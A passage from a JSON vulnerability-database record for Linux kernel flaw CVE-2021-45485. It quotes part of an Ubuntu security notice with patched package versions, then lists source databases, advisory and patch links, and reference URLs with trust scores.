(CVE-2021-34693)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in\nthe Linux kernel did not properly perform reference counting in some\nsituations, leading to a use-after-free vulnerability. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-3483)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device initialization failure, leading to a double-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3564)\n\nMurray McAllister discovered that the joystick device interface in the\nLinux kernel did not properly validate data passed via an ioctl(). A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code on systems with a joystick device\nregistered. (CVE-2021-3612)\n\nIt was discovered that the tracing subsystem in the Linux kernel did not\nproperly keep track of per-cpu ring buffer state. A privileged attacker\ncould use this to cause a denial of service. (CVE-2021-3679)\n\nIt was discovered that the MAX-3421 host USB device driver in the Linux\nkernel did not properly handle device removal events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2021-38204)\n\nIt was discovered that the 6pack network protocol driver in the Linux\nkernel did not properly perform validation checks. A privileged attacker\ncould use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2021-42008)\n\nAmit Klein discovered that the IPv6 implementation in the Linux kernel\ncould disclose internal state in some situations. An attacker could\npossibly use this to expose sensitive information. 
(CVE-2021-45485)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n linux-image-4.4.0-1100-kvm 4.4.0-1100.109\n linux-image-4.4.0-1135-aws 4.4.0-1135.149\n linux-image-4.4.0-219-generic 4.4.0-219.252\n linux-image-4.4.0-219-lowlatency 4.4.0-219.252\n linux-image-aws 4.4.0.1135.140\n linux-image-generic 4.4.0.219.226\n linux-image-kvm 4.4.0.1100.98\n linux-image-lowlatency 4.4.0.219.226\n linux-image-virtual 4.4.0.219.226\n\nUbuntu 14.04 ESM:\n linux-image-4.4.0-1099-aws 4.4.0-1099.104\n linux-image-4.4.0-219-generic 4.4.0-219.252~14.04.1\n linux-image-4.4.0-219-lowlatency 4.4.0-219.252~14.04.1\n linux-image-aws 4.4.0.1099.97\n linux-image-generic-lts-xenial 4.4.0.219.190\n linux-image-lowlatency-lts-xenial 4.4.0.219.190\n linux-image-virtual-lts-xenial 4.4.0.219.190\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://ubuntu.com/security/notices/USN-5299-1\n CVE-2020-26147, CVE-2020-26558, CVE-2021-0129, CVE-2021-28972,\n CVE-2021-33034, CVE-2021-34693, CVE-2021-3483, CVE-2021-3564,\n CVE-2021-3612, CVE-2021-3679, CVE-2021-38204, CVE-2021-42008,\n CVE-2021-45485\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-45485"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "PACKETSTORM",
"id": "167602"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167072"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "169695"
},
{
"db": "PACKETSTORM",
"id": "169997"
},
{
"db": "PACKETSTORM",
"id": "166101"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-45485",
"trust": 4.1
},
{
"db": "PACKETSTORM",
"id": "169695",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169997",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "169941",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169719",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "166101",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "169411",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0205",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5536",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.1225",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6062",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0215",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2023.0061",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0380",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.6111",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.2855",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0615",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3236",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.3136",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.0121",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2022.5590",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022070643",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022062931",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-409116",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-45485",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167602",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167622",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167072",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167330",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "PACKETSTORM",
"id": "167602"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167072"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "169695"
},
{
"db": "PACKETSTORM",
"id": "169997"
},
{
"db": "PACKETSTORM",
"id": "166101"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"id": "VAR-202112-2255",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:48:31.703000Z",
"patch": {
"_id": null,
"data": [
{
"title": "NTAP-20220121-0001",
"trust": 0.8,
"url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.3"
},
{
"title": "Linux kernel Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=177039"
},
{
"title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226983 - Security Advisory"
},
{
"title": "Red Hat: Important: kernel-rt security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226991 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.9.7 Images security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228609 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.8.53 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227874 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.10.39 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227211 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.9.51 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227216 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: USN-5299-1: Linux kernel vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5299-1"
},
{
"title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221988 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.6.5 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224814 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.7.2 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225483 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.4.5 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225201 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Advanced Cluster Management 2.5 security updates, images, and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224956 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.11 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225392 - Security Advisory"
},
{
"title": "Ubuntu Security Notice: USN-5343-1: Linux kernel vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5343-1"
},
{
"title": "Siemens Security Advisories: Siemens Security Advisory",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/SYRTI/POC_to_review "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/trhacknon/Pocingit "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-45485"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-2265"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-327",
"trust": 1.1
},
{
"problemtype": "Use of a broken or risky cryptographic algorithm (CWE-327) [NVD evaluation]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-409116"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.6,
"url": "https://arxiv.org/pdf/2112.09604.pdf"
},
{
"trust": 2.6,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20220121-0001/"
},
{
"trust": 1.8,
"url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.13.3"
},
{
"trust": 1.8,
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=62f20e068ccc50d6ab66fdb72ba90da2b9418c99"
},
{
"trust": 1.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45485"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-45485"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-45486"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1225"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2855"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169411/red-hat-security-advisory-2022-6991-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169719/red-hat-security-advisory-2022-7216-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.0061"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0121"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0380"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169997/red-hat-security-advisory-2022-8609-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169695/red-hat-security-advisory-2022-7211-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022062931"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5590"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169941/red-hat-security-advisory-2022-7874-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6062"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-information-disclosure-via-ipv6-id-generation-37138"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6111"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166101/ubuntu-security-notice-usn-5299-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0615"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3136"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022070643"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0205"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3236"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0215"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5536"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3752"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4157"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3744"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-13974"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3773"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4002"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29154"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-43976"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-0941"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-43389"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27820"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-44733"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4037"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-29154"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-37159"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3772"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-0404"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3669"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3764"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-20322"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-41864"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4197"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0941"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3612"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-26401"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-27820"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3743"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-1011"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13974"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20322"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4083"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-0322"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-26401"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-0286"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-0001"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3759"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-0002"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-4203"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-42739"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0404"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-41617"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3634"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-4189"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-1271"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-21781"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3634"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-4788"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-43056"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3737"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-4788"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-21781"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25032"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3669"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-5299-1"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-19131"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3696"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-38185"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28733"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21803"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28736"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3697"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28734"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-25219"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28737"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-25219"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-3695"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-28735"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-29810"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-19131"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3752"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3772"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3759"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3773"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3743"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3764"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37159"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4002"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3744"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45486"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21166"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21166"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21125"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21125"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2588"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21123"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-21123"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2588"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/327.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6983"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25645"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43565"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24450"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html-single/install/index#installing"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0536"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0492"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5392"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42739"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43389"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:1975"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4203"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4197"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-4157"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.6_release_notes/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41864"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:4814"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1154"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35492"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35492"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3807"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3737"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-39293"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3807"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21619"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26945"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:7211"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21626"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-39399"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2022:7210"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30321"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21626"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21618"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21618"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21628"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30323"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-40674"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-38177"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40674"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1996"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1996"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41974"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8609"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-41974"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
